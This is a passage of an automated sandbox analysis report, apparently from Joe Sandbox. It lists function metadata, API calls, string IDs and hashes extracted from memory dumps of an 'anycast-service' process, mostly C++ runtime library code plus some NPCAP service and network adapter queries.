                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Frame$BlockEstablisherHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                              • String ID: csm$csm$csm
                                                                                                                              • API String ID: 3436797354-393685449
                                                                                                                              • Opcode ID: 72019336f08b6ff4dd0456f38ea80b17e27fec430f09fd9ba5294d9f4f70a3b7
                                                                                                                              • Instruction ID: 71ad24adece826c99ac6947e46aa4051f0766ee0e8d200189df52ae124b975d8
                                                                                                                              • Opcode Fuzzy Hash: 72019336f08b6ff4dd0456f38ea80b17e27fec430f09fd9ba5294d9f4f70a3b7
                                                                                                                              • Instruction Fuzzy Hash: 8EE15E72A08B42CAEB209B69D4407AD77A0FB55BD9F000135EF8D57B9ADF38E592C704
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F8D640 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 196COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                              • API String ID: 0-3207858774
                                                                                                                              • Opcode ID: a73ddd776b63911ef06a3a5bfbf3e914ffe0fc59db4ba9ea0199b94d6fe38025
                                                                                                                              • Instruction ID: 0ec620559cdb4015da77882ab0ae6bc650f1a8568a81835613564b7eca829050
                                                                                                                              • Opcode Fuzzy Hash: a73ddd776b63911ef06a3a5bfbf3e914ffe0fc59db4ba9ea0199b94d6fe38025
                                                                                                                              • Instruction Fuzzy Hash: CA916A32F18A86D9FB109F68D440ABC27A0AF65B8AF544132DB4D03796DF3CE546C358
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F89C68 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 120COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Name::operator+$Name::operator+=
                                                                                                                              • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                                              • API String ID: 179159573-1464470183
                                                                                                                              • Opcode ID: 3bc59da8dd5ae0f4006b183ddbd6ab34b19126d6c4deb4f146aa0bcc50bdfa56
                                                                                                                              • Instruction ID: b31f8005ccc97fb8009f0467f82accab3ae27472cdd27c7eadb3dd05c23bfd17
                                                                                                                              • Opcode Fuzzy Hash: 3bc59da8dd5ae0f4006b183ddbd6ab34b19126d6c4deb4f146aa0bcc50bdfa56
                                                                                                                              • Instruction Fuzzy Hash: 26511832F18A12D9FB10CBA8E8409BC27B0FB153CAF540135EB4D56B9ADF29E556C748
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B80138B0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 52serviceCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Service$ErrorLast$CloseHandleOpen$ControlManager
                                                                                                                              • String ID: NPCAP
                                                                                                                              • API String ID: 4015900019-439943870
                                                                                                                              • Opcode ID: 149dce5f661f02a45b115207a9a31b95054789f3fcce2f38e55b2e7fd05c60c0
                                                                                                                              • Instruction ID: 1c65568cc2a0245c044713c07d3f3ccdcbea780d95e2e81a8dee13cc8b185b92
                                                                                                                              • Opcode Fuzzy Hash: 149dce5f661f02a45b115207a9a31b95054789f3fcce2f38e55b2e7fd05c60c0
                                                                                                                              • Instruction Fuzzy Hash: DB112C35A09B8287EF109B2BA85016A73A1BF8CBD0F454435EB4E46798DF7CE44B8A44
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F8844C Relevance: 15.2, APIs: 10, Instructions: 150COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Name::operator+
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2943138195-0
                                                                                                                              • Opcode ID: c85dfd3770f4c46d0067a16f7b51a3e2f67da6597058669031555ff49c259c8a
                                                                                                                              • Instruction ID: 9b78bfdfb04d888184a74964737fdf3118e7f967198fe268db4dc2433367acfc
                                                                                                                              • Opcode Fuzzy Hash: c85dfd3770f4c46d0067a16f7b51a3e2f67da6597058669031555ff49c259c8a
                                                                                                                              • Instruction Fuzzy Hash: 3D611672B24A62D8EB00DBA8D8845EC37B1BB44799F404436DF4D6BB8AEF78D546C344
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F82F18 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 319COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                              • String ID: csm$csm$csm
                                                                                                                              • API String ID: 211107550-393685449
                                                                                                                              • Opcode ID: b7f1687ac540f9cf291848bdfca689b72109a3c9514ba5f8293c5a8b76fd1a5d
                                                                                                                              • Instruction ID: 31a64876a9d10c072d98abfaf18d1284adadb3b18ee09d5da8fa9d68e7f2b256
                                                                                                                              • Opcode Fuzzy Hash: b7f1687ac540f9cf291848bdfca689b72109a3c9514ba5f8293c5a8b76fd1a5d
                                                                                                                              • Instruction Fuzzy Hash: 61E1AF73A08682CAE710DF68D444BAD7BA0FB44B89F114135EB8D577AADF38E586C704
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F8B48C Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Name::operator+
                                                                                                                              • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                              • API String ID: 2943138195-2239912363
                                                                                                                              • Opcode ID: 40a823c69bc58cf1d5f060907c4c28bfeb504558bb9779fa831d25e1e23a3ff6
                                                                                                                              • Instruction ID: e845a4f0e025fee27faf8ff54e86ba7d71ea815a06266f2784c57ad9318177af
                                                                                                                              • Opcode Fuzzy Hash: 40a823c69bc58cf1d5f060907c4c28bfeb504558bb9779fa831d25e1e23a3ff6
                                                                                                                              • Instruction Fuzzy Hash: DC514A72E18B52D8FB118B68D8456BC37B0BB587CAF444135DB4D16B9AEF3CA086C748
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F85C6A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                                                                                              • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                                                                                              • API String ID: 1852475696-928371585
                                                                                                                              • Opcode ID: bdd74ae8b8b0d7547c08b8019e9c772b487cddcf2be85f646e65eb4b425cb578
                                                                                                                              • Instruction ID: 08125f82078a97b61ec65979fc2b2270ca4a8284ab4fce134aaa5312bb394bc8
                                                                                                                              • Opcode Fuzzy Hash: bdd74ae8b8b0d7547c08b8019e9c772b487cddcf2be85f646e65eb4b425cb578
                                                                                                                              • Instruction Fuzzy Hash: 50518072A19A46D3EF20CB68E845AB96360FB88BC6F404435DB4D4776AEF3CE506C704
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F8D438 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Name::operator+$Name::operator+=
                                                                                                                              • String ID: {for
                                                                                                                              • API String ID: 179159573-864106941
                                                                                                                              • Opcode ID: 19b0705d6d046ec0c4997e548c0d9ab3612a9f79c705ee5b19f5818f0c5a6e27
                                                                                                                              • Instruction ID: 4872a1fc7b820f752dbcb7fce5bcd2f187e1e8150236605362aedd94a8b6f02c
                                                                                                                              • Opcode Fuzzy Hash: 19b0705d6d046ec0c4997e548c0d9ab3612a9f79c705ee5b19f5818f0c5a6e27
                                                                                                                              • Instruction Fuzzy Hash: F7515D72A18A85E9FB119F28D4447F833A1EB54789F808032EB4C4BB96EF3CD556C358
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F8660C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 86libraryloaderCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF8B8F867CB,?,?,00000000,00007FF8B8F865FC,?,?,?,?,00007FF8B8F86345), ref: 00007FF8B8F8668F
                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF8B8F867CB,?,?,00000000,00007FF8B8F865FC,?,?,?,?,00007FF8B8F86345), ref: 00007FF8B8F8669D
                                                                                                                              • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8B8F867CB,?,?,00000000,00007FF8B8F865FC,?,?,?,?,00007FF8B8F86345), ref: 00007FF8B8F866B6
                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF8B8F867CB,?,?,00000000,00007FF8B8F865FC,?,?,?,?,00007FF8B8F86345), ref: 00007FF8B8F866C8
                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF8B8F867CB,?,?,00000000,00007FF8B8F865FC,?,?,?,?,00007FF8B8F86345), ref: 00007FF8B8F8670E
                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF8B8F867CB,?,?,00000000,00007FF8B8F865FC,?,?,?,?,00007FF8B8F86345), ref: 00007FF8B8F8671A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                                              • String ID: api-ms-
                                                                                                                              • API String ID: 916704608-2084034818
                                                                                                                              • Opcode ID: df551f2d6bc0c08903c4ade2d612be6eb84fdc8b3c7f20cf772cd42b285e9dc5
                                                                                                                              • Instruction ID: 8fc687a7fa0b7e2f74517718e9233598fa09f20f894bc6fec7e74c49fa0919b0
                                                                                                                              • Opcode Fuzzy Hash: df551f2d6bc0c08903c4ade2d612be6eb84fdc8b3c7f20cf772cd42b285e9dc5
                                                                                                                              • Instruction Fuzzy Hash: 1F31A731B1A692D1EF11DB4AE8049796394BF44BE1F990535EF1D4B395EF3CE0868708
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8014DC0 Relevance: 12.2, APIs: 8, Instructions: 184synchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00007FF8B8012C20: WaitForSingleObject.KERNEL32 ref: 00007FF8B8012C45
                                                                                                                                • Part of subcall function 00007FF8B8012C20: ReleaseMutex.KERNEL32 ref: 00007FF8B8012C6B
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011DC4
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011DF9
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011E07
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011E15
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011E23
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011E46
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011E57
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: GetAdaptersAddresses.IPHLPAPI ref: 00007FF8B8011E8A
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011E99
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: HeapReAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011EAD
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011F04
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011F12
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011F3D
                                                                                                                              • GetLastError.KERNEL32 ref: 00007FF8B8014DEE
                                                                                                                              • WaitForSingleObject.KERNEL32 ref: 00007FF8B8014E02
                                                                                                                              • ReleaseMutex.KERNEL32 ref: 00007FF8B8014E1B
                                                                                                                              • SetLastError.KERNEL32 ref: 00007FF8B801504B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$Process$FreeMutexObjectReleaseSingleWait$AllocErrorLast$AdaptersAddresses
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 484160310-0
                                                                                                                              • Opcode ID: 66dbeef3055dc2f8a7e608b7cb28ad0e45786ce9a6880a8e9f62aeab20f7f256
                                                                                                                              • Instruction ID: c70c7621eba8f46d4964882114b34b2dbaaed735a45ac938db88d6ce0aae7749
                                                                                                                              • Opcode Fuzzy Hash: 66dbeef3055dc2f8a7e608b7cb28ad0e45786ce9a6880a8e9f62aeab20f7f256
                                                                                                                              • Instruction Fuzzy Hash: 7571A261A18A85C9EF55DB6A94443BA2AD2BF55BF0F148334EB2D073D4DF3C94478344
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F82348 Relevance: 12.1, APIs: 8, Instructions: 145COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: abort$AdjustPointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1501936508-0
                                                                                                                              • Opcode ID: 34f6984bcb568a573ffb8be3164793fa95510ac20118570602332f79800fcee6
                                                                                                                              • Instruction ID: 85e8266a6f6d3d7f1892e5df5a50d85cab58eb3f059c5737727fb8be962f8903
                                                                                                                              • Opcode Fuzzy Hash: 34f6984bcb568a573ffb8be3164793fa95510ac20118570602332f79800fcee6
                                                                                                                              • Instruction Fuzzy Hash: 3D517B31A0AA43C1EB659F49D494E396395AF48BC6F094439CB4D0A797DF3CF4938328
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F82524 Relevance: 12.1, APIs: 8, Instructions: 144COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: abort$AdjustPointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1501936508-0
                                                                                                                              • Opcode ID: cab5c15edc2c9e8529a438106080e9f5f31684deb96a010a44d1fd91ef8261d1
                                                                                                                              • Instruction ID: d4d444a814d81b75805c2f80525bf3f6f92e2c95076f4ed4400008ea7ba715f0
                                                                                                                              • Opcode Fuzzy Hash: cab5c15edc2c9e8529a438106080e9f5f31684deb96a010a44d1fd91ef8261d1
                                                                                                                              • Instruction Fuzzy Hash: BE519131A0AA87C2EB659B199458D396391AF54FC7F098435DB4D0A796EF3CF483C708
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8014030 Relevance: 12.1, APIs: 8, Instructions: 127COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastPerformanceQuery$ControlCounterDevice$Frequency
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 997184306-0
                                                                                                                              • Opcode ID: 22d39cdde8d6275e4184fa42d2b43b7a88eea6e06547045c4963ead59c204c12
                                                                                                                              • Instruction ID: f4e4c1f2308a07c89ab1465afacd597526686304e1974bb31b56a56442f7a810
